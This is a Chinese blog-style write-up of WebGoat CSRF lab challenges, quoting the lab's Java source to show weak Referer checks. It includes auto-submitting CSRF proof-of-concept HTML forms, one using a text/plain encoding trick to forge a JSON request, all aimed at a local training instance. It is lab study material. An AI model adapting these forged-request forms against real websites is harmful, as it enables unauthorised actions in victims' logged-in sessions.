0
点赞
收藏
分享

微信扫一扫

iOS常见崩溃简介

生活记录馆 03-21 17:01 阅读 2

前言:

注意:

CSRF漏洞

 Webgoat靶场实战

第一种:敏感功能缺乏CSRF防护机制
0x03

 提交抓包获取

像这种抓包没有发现Token或者验证码的 很容易出现CSRF漏洞 而且只有Referer防护措施, 我们只需测试Referer字段就可以了

这里利用方式有 好几种,我们直接可以利用BP里面的一键生成CSRF payload功能

利用burp直接generate csrf poc,然后点击Test in browser就可以模拟一次csrf攻击了。

 

表单代码

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1:8080/WebGoat/csrf/basic-get-flag" method="POST">
      <input type="hidden" name="csrf" value="false" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;æ&#159;&#165;è&#175;&#162;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

此时Burpsuite生成了一个POC(一个HTML页面),并将自己作为一个web服务器(恶意Web服务器B),浏览器通过生成的URL即可访问页面 ,若可信任服务器正常响应这个请求,说明漏洞利用成功

 利用成功,说明存在CSRF漏洞 

 

我们根据地址查看源码CSRFGetFlag.java

@PostMapping(
      path = "/csrf/basic-get-flag",
      produces = {"application/json"})
  @ResponseBody
  public Map<String, Object> invoke(HttpServletRequest req) {

    Map<String, Object> response = new HashMap<>();

    String host = (req.getHeader("host") == null) ? "NULL" : req.getHeader("host");
    String referer = (req.getHeader("referer") == null) ? "NULL" : req.getHeader("referer");
    String[] refererArr = referer.split("/");

    if (referer.equals("NULL")) {
      if ("true".equals(req.getParameter("csrf"))) {
        Random random = new Random();
        userSessionData.setValue("csrf-get-success", random.nextInt(65536));
        response.put("success", true);
        response.put("message", pluginMessages.getMessage("csrf-get-null-referer.success"));
        response.put("flag", userSessionData.getValue("csrf-get-success"));
      } else {
        Random random = new Random();
        userSessionData.setValue("csrf-get-success", random.nextInt(65536));
        response.put("success", true);
        response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
        response.put("flag", userSessionData.getValue("csrf-get-success"));
      }
    } else if (refererArr[2].equals(host)) {
      response.put("success", false);
      response.put("message", "Appears the request came from the original host");
      response.put("flag", null);
    } else {
      Random random = new Random();
      userSessionData.setValue("csrf-get-success", random.nextInt(65536));
      response.put("success", true);
      response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
      response.put("flag", userSessionData.getValue("csrf-get-success"));
    }

    return response;
  }
}

首先看这个

 String host = (req.getHeader("host") == null) ? "NULL" : req.getHeader("host");
    String referer = (req.getHeader("referer") == null) ? "NULL" : req.getHeader("referer");
    String[] refererArr = referer.split("/");//使用"/"字符将referer字符串拆分为字符串数组refererArr。

检查请求头中的"host"和"referer"字段是否存在,并将它们的值分别存储在量"host"和"referer"中。如果值为null,则将其设置为字符串"NULL"。 

我们直接看到下面这行代码

else if (refererArr[2].equals(host)) {
    // 请求来自原始主机
    response.put("success", false);
    response.put("message", "Appears the request came from the original host");
    response.put("flag", null);
}

如果referer不为"NULL",则检查referer的第二个元素(即主机名)是否等于host。如果相等,表示请求来自于原始主机,设置响应的属性来指示请求无效。 

else {
    Random random = new Random();
    userSessionData.setValue("csrf-get-success", random.nextInt(65536));
    response.put("success", true);
    response.put("message", pluginMessages.getMessage("csrf-get-other-referer.success"));
    response.put("flag", userSessionData.getValue("csrf-get-success"));
}

如果referer不为"NULL"且不是来自原始主机,则生成一个随机数并将其放入用户会话数据中,然后设置响应的属性。 

这里也就对应了上边host地址和Referer不一样的原因

其实有个更快捷的方法,根据代码分析 如果referer不为"NULL"且不是来自原始主机,则生成一个随机数并将其放入用户会话数据中,然后设置响应的属性。就是直接修改Referer的值就可以实现CSRF

0x04

这一关其实跟上关差不多 一样方法

源代码ForgedReviews.java

 if (referer != "NULL" && refererArr[2].equals(host)) {
      return failed(this).feedback("csrf-same-host").build();
    } else {
      return success(this)
          .feedback("csrf-review.success")
          .build(); // feedback("xss-stored-comment-failure")
    }

只要判定referer不为空且 则检查referer的第二个元素(即主机名)是否等于host就触发CSRF漏洞了

第二种:网站可允许写入 CSRF payload 
0x07 

我们随便输入抓包得到

POST提交的数据类型为JSON  根据题目的意思就是进行跨域请求了

那么关于JSON的跨域请求可以参考下边这篇文章

https://www.secpulse.com/archives/61297.html

题目是没有验证Content-type

 

那我们可以使用form表单提交来实现跨域请求

 可以参考 

https://blog.csdn.net/haochangdi123/article/details/104812970

 

我们可以构造利用上传html文件进行请求,实现跨域。 

<html>
<form name="attack" enctype="text/plain" action="http://localhost:8080/WebGoat/csrf/feedback/message" METHOD="POST">
<input type="hidden" name='{"name": "Testf", "email": "teddst1233@163.com", "subject": "service", "message":"' value='dsaffd"}'>
</form>
<script>document.attack.submit();
</script>
</html>

这里的关键也就是上文所说的将 json拼接在input属性中,也就是下面这行: 

构造出的POST数据为

{name: "Testf", email: "teddst1233@163.com", message: "=dsaffd"}

这就是为什么如果只将json放在name里,不写value值的话,json数据末尾会多一个=,自然也就无法解析成功了。 

然后打开重新登入之后就利用成功了

原理是请求wolf返回的html,向webgoat发送了请求提交了表单。该请求的origin和referer都是wolf的地址,所以实现了跨域请求。   

我们查看源码

@PostMapping(
      value = "/csrf/feedback/message",
      produces = {"application/json"})
  @ResponseBody
  public AttackResult completed(HttpServletRequest request, @RequestBody String feedback) {
    try {
      objectMapper.enable(DeserializationFeature.FAIL_ON_IGNORED_PROPERTIES);
      objectMapper.enable(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES);
      objectMapper.enable(DeserializationFeature.FAIL_ON_NUMBERS_FOR_ENUMS);
      objectMapper.enable(DeserializationFeature.FAIL_ON_READING_DUP_TREE_KEY);
      objectMapper.enable(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES);
      objectMapper.enable(DeserializationFeature.FAIL_ON_TRAILING_TOKENS);
      objectMapper.readValue(feedback.getBytes(), Map.class);
    } catch (IOException e) {
      return failed(this).feedback(ExceptionUtils.getStackTrace(e)).build();
    }
    boolean correctCSRF =
        requestContainsWebGoatCookie(request.getCookies())
            && request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
    correctCSRF &= hostOrRefererDifferentHost(request);
    if (correctCSRF) {
      String flag = UUID.randomUUID().toString();
      userSessionData.setValue("csrf-feedback", flag);
      return success(this).feedback("csrf-feedback-success").feedbackArgs(flag).build();
    }
    return failed(this).build();
  }

  

重点看下面这段

  boolean correctCSRF =
        requestContainsWebGoatCookie(request.getCookies())
            && request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE);
//执行第一个CSRF检查条件:

检查请求中是否包含名为"WebGoatCookie"的Cookie。requestContainsWebGoatCookie(request.getCookies())方法用于检查是否存在该Cookie。
检查请求的内容类型是否包含"text/plain"。request.getContentType().contains(MediaType.TEXT_PLAIN_VALUE)用于检查内容类型。
如果上述两个条件均满足,则将correctCSRF保持为true,否则将其设置为false


 correctCSRF &= hostOrRefererDifferentHost(request);
//执行第二个CSRF检查条件:

调用hostOrRefererDifferentHost(request)方法,该方法用于检查请求的"host"和"referer"字段是否来自不同的主机。
如果"host"和"referer"字段来自不同的主机,则将correctCSRF保持为true,否则将其设置为false。
  

如果都为真就进入下边

if (correctCSRF) {
      String flag = UUID.randomUUID().toString();
      userSessionData.setValue("csrf-feedback", flag);
      return success(this).feedback("csrf-feedback-success").feedbackArgs(flag).build();
    }
    return failed(this).build();
  • 如果correctCSRFtrue,表示通过了CSRF检查。生成一个随机的UUID作为"csrf-feedback"的值,并将其存储到"userSessionData"中。

所以我们能得到一个随机flag

通过源码分析 我们就可以直接利用上面分析出来的漏洞

所以我们直接利用就发现了CSRF漏洞 

防护

举报

相关推荐

0 条评论